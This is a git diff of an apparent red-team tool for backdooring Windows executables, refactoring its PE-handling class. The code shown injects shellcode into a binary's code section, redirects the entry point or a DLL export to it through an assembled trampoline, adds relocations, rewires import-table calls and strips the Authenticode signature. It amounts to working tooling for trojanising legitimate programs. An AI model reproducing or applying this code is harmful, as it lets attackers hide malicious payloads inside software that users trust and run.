diff --git a/model/exehost.py b/model/exehost.py index 38fd5e7..911aa9a 100644 --- a/model/exehost.py +++ b/model/exehost.py @@ -5,9 +5,8 @@ from intervaltree import Interval, IntervalTree from model.defs import * import pe.pehelper as pehelper -from pe.superpe import SuperPe +from pe.superpe import SuperPe, PeSection from model.carrier import Carrier -from pe.superpe import PeSection logger = logging.getLogger("ExeHost") @@ -33,7 +32,6 @@ class ExeHost(): # we keep this open # And modify the EXE through this at the end - self.pe: pefile.PE = None self.superpe: SuperPe = None self.iat: Dict[str, IatEntry] = {} @@ -54,29 +52,25 @@ class ExeHost(): def init(self): logger.info("--[ Analyzing: {}".format(self.filepath)) + self.superpe = SuperPe(self.filepath) - pe = pefile.PE(self.filepath) - self.pe = pe - self.superpe = SuperPe(pe) - self.superpe.init() - - if pe.FILE_HEADER.Machine != 0x8664: + if self.superpe.arch != "x64": raise Exception("Binary is not 64bit: {}".format(self.filepath)) - self.ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint + self.ep = self.superpe.get_entyrpoint() self.ep_raw = self.superpe.get_physical_address(self.ep) # image base - self.image_base = pe.OPTIONAL_HEADER.ImageBase + self.image_base = self.superpe.pe.OPTIONAL_HEADER.ImageBase # dynamic base / ASLR - if pe.OPTIONAL_HEADER.DllCharacteristics & pefile.DLL_CHARACTERISTICS['IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE']: + if self.superpe.pe.OPTIONAL_HEADER.DllCharacteristics & pefile.DLL_CHARACTERISTICS['IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE']: self.dynamic_base = True else: self.dynamic_base = False # .text virtual address - self.code_section = pehelper.get_code_section(pe) + self.code_section = pehelper.get_code_section(self.superpe.pe) self.code_virtaddr = self.code_section.VirtualAddress self.code_size = self.code_section.Misc_VirtualSize logger.info("---[ Injectable: Chosen code section: {} at 0x{:x} size: {}".format( @@ -85,8 +79,8 @@ class ExeHost(): self.code_size)) # relocs - if hasattr(pe, 'DIRECTORY_ENTRY_BASERELOC'): - for base_reloc in pe.DIRECTORY_ENTRY_BASERELOC: + if hasattr(self.superpe.pe, 'DIRECTORY_ENTRY_BASERELOC'): + for base_reloc in self.superpe.pe.DIRECTORY_ENTRY_BASERELOC: for entry in base_reloc.entries: rva = entry.rva base_rva = entry.base_rva @@ -94,8 +88,8 @@ class ExeHost(): self.base_relocs.append(PeRelocEntry(rva, base_rva, reloc_type)) # rwx section - entrypoint = pe.OPTIONAL_HEADER.AddressOfEntryPoint - for section in pe.sections: + entrypoint = self.superpe.pe.OPTIONAL_HEADER.AddressOfEntryPoint + for section in self.superpe.pe.sections: if (section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] and section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] and section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE'] @@ -107,7 +101,7 @@ class ExeHost(): #pe.parse_data_directories() # IAT - for entry in pe.DIRECTORY_ENTRY_IMPORT: + for entry in self.superpe.pe.DIRECTORY_ENTRY_IMPORT: for imp in entry.imports: dll_name = entry.dll.decode('utf-8') if imp.name == None: diff --git a/pe/derbackdoorer.py b/pe/derbackdoorer.py index 3218a0f..d535dcd 100644 --- a/pe/derbackdoorer.py +++ b/pe/derbackdoorer.py @@ -12,15 +12,15 @@ from enum import IntEnum import logging from helper import hexdump -from pe.mype import MyPe +from pe.superpe import SuperPe from model.defs import * logger = logging.getLogger("DerBackdoorer") class PeBackdoor: - def __init__(self, mype: MyPe, main_shc: bytes, inject_mode: InjectStyle): - self.mype: MyPe = mype + def __init__(self, superpe: SuperPe, main_shc: bytes, inject_mode: InjectStyle): + self.superpe: SuperPe = superpe self.runMode: InjectStyle = inject_mode self.shellcodeData: bytes = main_shc @@ -31,7 +31,7 @@ class PeBackdoor: def injectShellcode(self): - sect = self.mype.get_code_section() + sect = self.superpe.get_code_section() if sect == None: logger.error('Could not find code section in input PE file!') return False @@ -48,22 +48,22 @@ Code section size : {sect_size} offset = int((sect_size - len(self.shellcodeData)) / 2) logger.debug(f'Inserting shellcode into 0x{offset:x} offset.') - self.mype.pe.set_bytes_at_offset(offset, self.shellcodeData) + self.superpe.pe.set_bytes_at_offset(offset, self.shellcodeData) self.shellcodeOffset = offset self.shellcodeOffsetRel = offset - sect.PointerToRawData - rva = self.mype.pe.get_rva_from_offset(offset) + rva = self.superpe.pe.get_rva_from_offset(offset) p = sect.PointerToRawData + sect.SizeOfRawData - 64 graph = textwrap.indent(f''' Beginning of {sect_name}: -{textwrap.indent(hexdump(self.mype.pe.get_data(sect.VirtualAddress), sect.VirtualAddress, 64), "0")} +{textwrap.indent(hexdump(self.superpe.pe.get_data(sect.VirtualAddress), sect.VirtualAddress, 64), "0")} Injected shellcode in the middle of {sect_name}: {hexdump(self.shellcodeData, offset, 64)} Trailing {sect_name} bytes: -{hexdump(self.mype.pe.get_data(self.mype.pe.get_rva_from_offset(p)), p, 64)} +{hexdump(self.superpe.pe.get_data(self.superpe.pe.get_rva_from_offset(p)), p, 64)} ''', '\t') logger.info(f'Shellcode injected into existing code section at RVA 0x{rva:x}') @@ -73,8 +73,8 @@ Trailing {sect_name} bytes: def setupShellcodeEntryPoint(self): if self.runMode == InjectStyle.ChangeEntryPoint: - rva = self.mype.pe.get_rva_from_offset(self.shellcodeOffset) - self.mype.set_entrypoint(rva) + rva = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset) + self.superpe.set_entrypoint(rva) logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}') return True @@ -101,19 +101,19 @@ Trailing {sect_name} bytes: logger.critical('Export name not specified! Specify DLL Exported function name to hijack with -e/--export') d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]] - self.mype.pe.parse_data_directories(directories=d) + self.superpe.pe.parse_data_directories(directories=d) - if self.mype.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0: + if self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0: logger.error('No DLL exports found! Specify existing DLL Exported function with -e/--export!') return -1 - exports = [(e.ordinal, dec(e.name)) for e in self.mype.pe.DIRECTORY_ENTRY_EXPORT.symbols] + exports = [(e.ordinal, dec(e.name)) for e in self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols] for export in exports: logger.debug(f'DLL Export: {export[0]} {export[1]}') if export[1].lower() == exportName.lower(): - addr = self.mype.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address + addr = self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address logger.info(f'Found DLL Export "{exportName}" at RVA 0x{addr:x} . Attempting to hijack it...') return addr @@ -121,13 +121,13 @@ Trailing {sect_name} bytes: def backdoorEntryPoint(self, addr = -1): - imageBase = self.mype.pe.OPTIONAL_HEADER.ImageBase - self.shellcodeAddr = self.mype.pe.get_rva_from_offset(self.shellcodeOffset) + imageBase + imageBase = self.superpe.pe.OPTIONAL_HEADER.ImageBase + self.shellcodeAddr = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset) + imageBase cs = None ks = None - if self.mype.arch == 'x86': + if self.superpe.arch == 'x86': cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32 + capstone.CS_MODE_LITTLE_ENDIAN) ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_32 + keystone.KS_MODE_LITTLE_ENDIAN) else: @@ -139,33 +139,33 @@ Trailing {sect_name} bytes: ep = addr if addr == -1: - ep = self.mype.pe.OPTIONAL_HEADER.AddressOfEntryPoint + ep = self.superpe.pe.OPTIONAL_HEADER.AddressOfEntryPoint - ep_ava = ep + self.mype.pe.OPTIONAL_HEADER.ImageBase - data = self.mype.pe.get_memory_mapped_image()[ep:ep+128] + ep_ava = ep + self.superpe.pe.OPTIONAL_HEADER.ImageBase + data = self.superpe.pe.get_memory_mapped_image()[ep:ep+128] offset = 0 logger.debug('Entry Point disasm:') - disasmData = self.mype.pe.get_memory_mapped_image() - output = self.mype.disasmBytes(cs, ks, disasmData, ep, 128, self.backdoorInstruction) + disasmData = self.superpe.pe.get_memory_mapped_image() + output = self.superpe.disasmBytes(cs, ks, disasmData, ep, 128, self.backdoorInstruction) # store offset... by calculating it first FUCK - section = self.mype.get_code_section() + section = self.superpe.get_code_section() self.backdoorOffsetRel = output - section.VirtualAddress if output != 0: logger.debug('Now disasm looks like follows: ') - disasmData = self.mype.pe.get_memory_mapped_image() - self.mype.disasmBytes(cs, ks, disasmData, output - 32, 32, None, maxDepth = 3) + disasmData = self.superpe.pe.get_memory_mapped_image() + self.superpe.disasmBytes(cs, ks, disasmData, output - 32, 32, None, maxDepth = 3) logger.debug('\n[>] Inserted backdoor code: ') for instr in cs.disasm(bytes(self.compiledTrampoline), output): - self.mype.printInstr(instr, 1) + self.superpe.printInstr(instr, 1) logger.debug('') - self.mype.disasmBytes(cs, ks, disasmData, output + len(self.compiledTrampoline), 32, None, maxDepth = 3) + self.superpe.disasmBytes(cs, ks, disasmData, output + len(self.compiledTrampoline), 32, None, maxDepth = 3) else: logger.error('Did not find suitable candidate for Entry Point branch hijack!') @@ -179,7 +179,7 @@ Trailing {sect_name} bytes: registers = ['rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi'] - if self.mype.arch == 'x86': + if self.superpe.arch == 'x86': registers = ['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi'] reg = random.choice(registers).upper() @@ -232,14 +232,14 @@ Trailing {sect_name} bytes: if len(trampoline) > 0: encoding, count = ks.asm(trampoline) - self.mype.pe.set_bytes_at_rva(instr.address, bytes(encoding)) + self.superpe.pe.set_bytes_at_rva(instr.address, bytes(encoding)) relocs = ( instr.address + addrOffset, ) pageRva = 4096 * int((instr.address + addrOffset) / 4096) - self.mype.addImageBaseRelocations(pageRva, relocs) + self.superpe.addImageBaseRelocations(pageRva, relocs) self.trampoline = trampoline self.compiledTrampoline = encoding @@ -252,13 +252,13 @@ Trailing {sect_name} bytes: def removeSignature(self): - addr = self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress - size = self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size + addr = self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress + size = self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size - self.mype.pe.set_bytes_at_rva(addr, b'\x00' * size) + self.superpe.pe.set_bytes_at_rva(addr, b'\x00' * size) - self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0 - self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size = 0 + self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0 + self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size = 0 logger.info('PE executable Authenticode signature removed.') return True \ No newline at end of file diff --git a/pe/mype.py b/pe/mype.py deleted file mode 100644 index 133ab13..0000000 --- a/pe/mype.py +++ /dev/null @@ -1,199 +0,0 @@ -import pefile -import capstone -from enum import IntEnum -import logging - -from helper import hexdump - -logger = logging.getLogger("MyPe") - - -class MyPe(): - IMAGE_DIRECTORY_ENTRY_SECURITY = 4 - IMAGE_DIRECTORY_ENTRY_BASERELOC = 5 - IMAGE_DIRECTORY_ENTRY_TLS = 9 - - IMAGE_REL_BASED_ABSOLUTE = 0 - IMAGE_REL_BASED_HIGH = 1 - IMAGE_REL_BASED_LOW = 2 - IMAGE_REL_BASED_HIGHLOW = 3 - IMAGE_REL_BASED_HIGHADJ = 4 - IMAGE_REL_BASED_DIR64 = 10 - - - def __init__(self): - self.pe = None - - - def openFile(self, infile): - self.pe = pefile.PE(infile, fast_load=False) - self.pe.parse_data_directories() - - self.ptrSize = 4 - self.arch = self.getFileArch() - if self.arch == 'x64': - self.ptrSize = 8 - - - def getFileArch(self): - if self.pe.FILE_HEADER.Machine == 0x014c: - return "x86" - - if self.pe.FILE_HEADER.Machine == 0x8664: - return "x64" - - raise Exception("Unsupported PE file architecture.") - - - def get_code_section(self): - entrypoint = self.pe.OPTIONAL_HEADER.AddressOfEntryPoint - for sect in self.pe.sections: - if sect.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']: - if entrypoint >= sect.VirtualAddress and entrypoint <= sect.VirtualAddress + sect.Misc_VirtualSize: - return sect - return None - - - def get_code_section_data(self) -> bytes: - sect = self.get_code_section() - return bytes(sect.get_data()) - - - def write_code_section_data(self, data: bytes): - sect = self.get_code_section() - self.pe.set_bytes_at_offset(sect.PointerToRawData, data) - - - def getSectionIndexByDataDir(self, dirIndex): - addr = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[dirIndex].VirtualAddress - - i = 0 - for sect in self.pe.sections: - if addr >= sect.VirtualAddress and addr < (sect.VirtualAddress + sect.Misc_VirtualSize): - return i - i += 1 - - logger.error(f'Could not find section with directory index {dirIndex}!') - return -1 - - - def getRemainingRelocsDirectorySize(self): - relocsIndex = self.getSectionIndexByDataDir(MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC) - out = self.pe.sections[relocsIndex].SizeOfRawData - self.pe.sections[relocsIndex].Misc_VirtualSize - return out - - - def getSectionIndexByName(self, name): - i = 0 - for sect in self.pe.sections: - if sect.Name.decode().lower().startswith(name.lower()): - return i - i += 1 - - logger.error(f'Could not find section with name {name}!') - return -1 - - - def addImageBaseRelocations(self, pageRva, relocs): - assert pageRva > 0 - - if not self.pe.has_relocs(): - logger.error("No .reloc section") - raise(Exception("No .reloc section")) - - imageBaseRelocType = MyPe.IMAGE_REL_BASED_HIGHLOW - if self.arch == 'x64': - imageBaseRelocType = MyPe.IMAGE_REL_BASED_DIR64 - - logger.info('Adding new relocations to backdoored PE file...') - - relocsSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size - relocsIndex = self.getSectionIndexByDataDir(MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC) - addr = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress - sizeOfReloc = 2 * len(relocs) + 2 * 4 - - if sizeOfReloc >= self.getRemainingRelocsDirectorySize(): - self.logger.warn('WARNING! Cannot add any more relocations to this file. Probably TLS Callback execution technique wont work.') - self.logger.warn(' Will try disabling relocations on output file. Expect corrupted executable though!') - - self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress = 0 - self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size = 0 - return - - relocDirRva = self.pe.sections[relocsIndex].VirtualAddress - self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size += sizeOfReloc - - # VirtualAddress - self.pe.set_dword_at_rva(addr + relocsSize, pageRva) - - # SizeOfBlock - self.pe.set_dword_at_rva(addr + relocsSize + 4, sizeOfReloc) - - logger.info(f'Adding {len(relocs)} relocations for Page RVA 0x{pageRva:x} - size of block: 0x{sizeOfReloc:x}') - - i = 0 - for reloc in relocs: - reloc_offset = (reloc - pageRva) - reloc_type = imageBaseRelocType << 12 - - relocWord = (reloc_type | reloc_offset) - self.pe.set_word_at_rva(relocDirRva + relocsSize + 8 + i * 2, relocWord) - logger.info(f'\tReloc{i} for addr 0x{reloc:x}: 0x{relocWord:x} - 0x{reloc_offset:x} - type: {imageBaseRelocType}') - i += 1 - - - ## Helpers - - def get_entyrpoint(self) -> int: - return self.pe.OPTIONAL_HEADER.AddressOfEntryPoint - - def set_entrypoint(self, entrypoint: int): - self.pe.OPTIONAL_HEADER.AddressOfEntryPoint = entrypoint - - - def write(self, outfile: str): - self.pe.write(outfile) - - - def disasmBytes(self, cs, ks, disasmData, startOffset, length, callback = None, maxDepth = 5): - return self._disasmBytes(cs, ks, disasmData, startOffset, length, callback, maxDepth, 1) - - - def printInstr(self, instr, depth): - _bytes = [f'{x:02x}' for x in instr.bytes[:8]] - if len(instr.bytes) < 8: - _bytes.extend([' ',] * (8 - len(instr.bytes))) - - instrBytes = ' '.join([f'{x}' for x in _bytes]) - logger.debug('\t' * 1 + f'[{instr.address:08x}]\t{instrBytes}' + '\t' * depth + f'{instr.mnemonic}\t{instr.op_str}') - - - def _disasmBytes(self, cs, ks, disasmData, startOffset, length, callback, maxDepth, depth): - if depth > maxDepth: - return 0 - - data = disasmData[startOffset:startOffset + length] - - for instr in cs.disasm(data, startOffset): - self.printInstr(instr, depth) - - if len(instr.operands) == 1: - operand = instr.operands[0] - - if operand.type == capstone.CS_OP_IMM: - logger.debug('\t' * (depth+1) + f' -> OP_IMM: 0x{operand.value.imm:x}') - logger.debug('') - - if callback: - out = callback(cs, ks, disasmData, startOffset, instr, operand, depth) - if out != 0: - return out - - if depth + 1 <= maxDepth: - out = self._disasmBytes(cs, ks, disasmData, operand.value.imm, length, callback, maxDepth, depth + 1) - return out - - if not callback: - return 1 - - return 0 diff --git a/pe/pehelper.py b/pe/pehelper.py index bea9ef7..df65f14 100644 --- a/pe/pehelper.py +++ b/pe/pehelper.py @@ -11,7 +11,7 @@ logger = logging.getLogger("PEHelper") # PEHelper -# Work directly on PE files. Not using mype or other abstractions. +# Work directly on PE files. Not using superpe or other abstractions. # Its mostly used for verification of what we were doing. diff --git a/pe/superpe.py b/pe/superpe.py index 8579938..be85907 100644 --- a/pe/superpe.py +++ b/pe/superpe.py @@ -1,6 +1,12 @@ -from typing import List import pefile +import capstone +from enum import IntEnum +import logging +from typing import List +from helper import hexdump + +logger = logging.getLogger("superpe") class PeSection(): def __init__(self, pefile_section: pefile.SectionStructure): @@ -9,22 +15,34 @@ class PeSection(): self.raw_size: int = pefile_section.SizeOfRawData self.virt_addr: int = pefile_section.VirtualAddress self.virt_size: int = pefile_section.Misc_VirtualSize - #self.permissions = pefile_section.Characteristics - class SuperPe(): - """Interact with a PE file using pefile""" + IMAGE_DIRECTORY_ENTRY_SECURITY = 4 + IMAGE_DIRECTORY_ENTRY_BASERELOC = 5 + IMAGE_DIRECTORY_ENTRY_TLS = 9 - def __init__(self, pe: pefile.PE): - self.pe: pefile.PE = pe + IMAGE_REL_BASED_ABSOLUTE = 0 + IMAGE_REL_BASED_HIGH = 1 + IMAGE_REL_BASED_LOW = 2 + IMAGE_REL_BASED_HIGHLOW = 3 + IMAGE_REL_BASED_HIGHADJ = 4 + IMAGE_REL_BASED_DIR64 = 10 + + + def __init__(self, infile: str): self.pe_sections: List[PeSection] = [] - - - def init(self): + self.pe = pefile.PE(infile, fast_load=False) for section in self.pe.sections: self.pe_sections.append(PeSection(section)) + self.pe.parse_data_directories() + self.ptrSize = 4 + self.arch = self.getFileArch() + if self.arch == 'x64': + self.ptrSize = 8 + + ################## def get_section_by_name(self, name: str) -> PeSection: for section in self.pe_sections: if section.name == name: @@ -46,4 +64,165 @@ class SuperPe(): return None + def getFileArch(self): + if self.pe.FILE_HEADER.Machine == 0x014c: + return "x86" + if self.pe.FILE_HEADER.Machine == 0x8664: + return "x64" + + raise Exception("Unsupported PE file architecture.") + + + def get_code_section(self): + entrypoint = self.pe.OPTIONAL_HEADER.AddressOfEntryPoint + for sect in self.pe.sections: + if sect.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']: + if entrypoint >= sect.VirtualAddress and entrypoint <= sect.VirtualAddress + sect.Misc_VirtualSize: + return sect + return None + + + def get_code_section_data(self) -> bytes: + sect = self.get_code_section() + return bytes(sect.get_data()) + + + def write_code_section_data(self, data: bytes): + sect = self.get_code_section() + self.pe.set_bytes_at_offset(sect.PointerToRawData, data) + + + def getSectionIndexByDataDir(self, dirIndex): + addr = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[dirIndex].VirtualAddress + + i = 0 + for sect in self.pe.sections: + if addr >= sect.VirtualAddress and addr < (sect.VirtualAddress + sect.Misc_VirtualSize): + return i + i += 1 + + logger.error(f'Could not find section with directory index {dirIndex}!') + return -1 + + + def getRemainingRelocsDirectorySize(self): + relocsIndex = self.getSectionIndexByDataDir(SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC) + out = self.pe.sections[relocsIndex].SizeOfRawData - self.pe.sections[relocsIndex].Misc_VirtualSize + return out + + + def getSectionIndexByName(self, name): + i = 0 + for sect in self.pe.sections: + if sect.Name.decode().lower().startswith(name.lower()): + return i + i += 1 + + logger.error(f'Could not find section with name {name}!') + return -1 + + + def addImageBaseRelocations(self, pageRva, relocs): + assert pageRva > 0 + + if not self.pe.has_relocs(): + logger.error("No .reloc section") + raise(Exception("No .reloc section")) + + imageBaseRelocType = SuperPe.IMAGE_REL_BASED_HIGHLOW + if self.arch == 'x64': + imageBaseRelocType = SuperPe.IMAGE_REL_BASED_DIR64 + + logger.info('Adding new relocations to backdoored PE file...') + + relocsSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size + relocsIndex = self.getSectionIndexByDataDir(SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC) + addr = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress + sizeOfReloc = 2 * len(relocs) + 2 * 4 + + if sizeOfReloc >= self.getRemainingRelocsDirectorySize(): + self.logger.warn('WARNING! Cannot add any more relocations to this file. Probably TLS Callback execution technique wont work.') + self.logger.warn(' Will try disabling relocations on output file. Expect corrupted executable though!') + + self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress = 0 + self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size = 0 + return + + relocDirRva = self.pe.sections[relocsIndex].VirtualAddress + self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size += sizeOfReloc + + # VirtualAddress + self.pe.set_dword_at_rva(addr + relocsSize, pageRva) + + # SizeOfBlock + self.pe.set_dword_at_rva(addr + relocsSize + 4, sizeOfReloc) + + logger.info(f'Adding {len(relocs)} relocations for Page RVA 0x{pageRva:x} - size of block: 0x{sizeOfReloc:x}') + + i = 0 + for reloc in relocs: + reloc_offset = (reloc - pageRva) + reloc_type = imageBaseRelocType << 12 + + relocWord = (reloc_type | reloc_offset) + self.pe.set_word_at_rva(relocDirRva + relocsSize + 8 + i * 2, relocWord) + logger.info(f'\tReloc{i} for addr 0x{reloc:x}: 0x{relocWord:x} - 0x{reloc_offset:x} - type: {imageBaseRelocType}') + i += 1 + + + ## Helpers + + def get_entyrpoint(self) -> int: + return self.pe.OPTIONAL_HEADER.AddressOfEntryPoint + + def set_entrypoint(self, entrypoint: int): + self.pe.OPTIONAL_HEADER.AddressOfEntryPoint = entrypoint + + + def write(self, outfile: str): + self.pe.write(outfile) + + + def disasmBytes(self, cs, ks, disasmData, startOffset, length, callback = None, maxDepth = 5): + return self._disasmBytes(cs, ks, disasmData, startOffset, length, callback, maxDepth, 1) + + + def printInstr(self, instr, depth): + _bytes = [f'{x:02x}' for x in instr.bytes[:8]] + if len(instr.bytes) < 8: + _bytes.extend([' ',] * (8 - len(instr.bytes))) + + instrBytes = ' '.join([f'{x}' for x in _bytes]) + logger.debug('\t' * 1 + f'[{instr.address:08x}]\t{instrBytes}' + '\t' * depth + f'{instr.mnemonic}\t{instr.op_str}') + + + def _disasmBytes(self, cs, ks, disasmData, startOffset, length, callback, maxDepth, depth): + if depth > maxDepth: + return 0 + + data = disasmData[startOffset:startOffset + length] + + for instr in cs.disasm(data, startOffset): + self.printInstr(instr, depth) + + if len(instr.operands) == 1: + operand = instr.operands[0] + + if operand.type == capstone.CS_OP_IMM: + logger.debug('\t' * (depth+1) + f' -> OP_IMM: 0x{operand.value.imm:x}') + logger.debug('') + + if callback: + out = callback(cs, ks, disasmData, startOffset, instr, operand, depth) + if out != 0: + return out + + if depth + 1 <= maxDepth: + out = self._disasmBytes(cs, ks, disasmData, operand.value.imm, length, callback, maxDepth, depth + 1) + return out + + if not callback: + return 1 + + return 0 diff --git a/phases/injector.py b/phases/injector.py index 09ada22..e20f286 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -8,7 +8,7 @@ from pe.pehelper import * from model.exehost import * from observer import observer from pe.derbackdoorer import PeBackdoor -from pe.mype import MyPe +from pe.superpe import SuperPe from model.project import Project from model.settings import Settings @@ -40,10 +40,9 @@ def inject_exe( )) return False - # MyPe is a representation of the exe file. We gonna modify it, and save it at the end. - mype = MyPe() - mype.openFile(exe_in) - peinj = PeBackdoor(mype, main_shc, inject_mode) + # superpe is a representation of the exe file. We gonna modify it, and save it at the end. + superpe = SuperPe(exe_in) + peinj = PeBackdoor(superpe, main_shc, inject_mode) if not peinj.injectShellcode(): logger.error('Could not inject shellcode into PE file!') @@ -54,12 +53,12 @@ def inject_exe( return False if source_style == SourceStyle.iat_reuse: - injected_fix_iat(mype, project.carrier, project.exe_host) + injected_fix_iat(superpe, project.carrier, project.exe_host) if True: - injected_fix_data(mype, project.carrier, project.exe_host) + injected_fix_data(superpe, project.carrier, project.exe_host) - mype.write(exe_out) + superpe.write(exe_out) # verify and log shellcode = file_readall_binary(shellcode_in) @@ -74,9 +73,9 @@ def inject_exe( # raise Exception("Shellcode injection error") -def injected_fix_iat(mype: MyPe, carrier: Carrier, exe_host: ExeHost): +def injected_fix_iat(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost): """replace IAT-placeholders in shellcode with call's to the IAT""" - code = mype.get_code_section_data() + code = superpe.get_code_section_data() for iatRequest in carrier.get_all_iat_requests(): if not iatRequest.placeholder in code: @@ -95,10 +94,10 @@ def injected_fix_iat(mype: MyPe, carrier: Carrier, exe_host: ExeHost): ) code = code.replace(iatRequest.placeholder, jmp) - mype.write_code_section_data(code) + superpe.write_code_section_data(code) -def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost): +def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost): """Inject shellcode-data into .rdata and replace reusedata_fixup placeholders in code with LEA""" # Insert my data into the .rdata section. # Chose and save each datareuse_fixup's addres. @@ -115,7 +114,7 @@ def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost): var_data = datareuse_fixup.data #print(" Addr: {} / 0x{:X} Data: {}".format( # addr, addr, len(var_data))) - mype.pe.set_bytes_at_offset(addr, var_data) + superpe.pe.set_bytes_at_offset(addr, var_data) #f.seek(addr) #f.write(var_data) datareuse_fixup.addr = addr + sect.virt_addr + exe_host.image_base - sect.raw_addr @@ -123,7 +122,7 @@ def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost): # patch code section # replace the placeholder with a LEA instruction to the data we written above - code = mype.get_code_section_data() + code = superpe.get_code_section_data() for datareuse_fixup in reusedata_fixups: if not datareuse_fixup.randbytes in code: raise Exception("DataResuse: ID {} not found, abort".format( @@ -139,7 +138,7 @@ def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost): instruction_virtual_address, destination_virtual_address, datareuse_fixup.register ) code = code.replace(datareuse_fixup.randbytes, lea) - mype.write_code_section_data(code) + superpe.write_code_section_data(code) def verify_injected_exe(exefile: FilePath) -> int: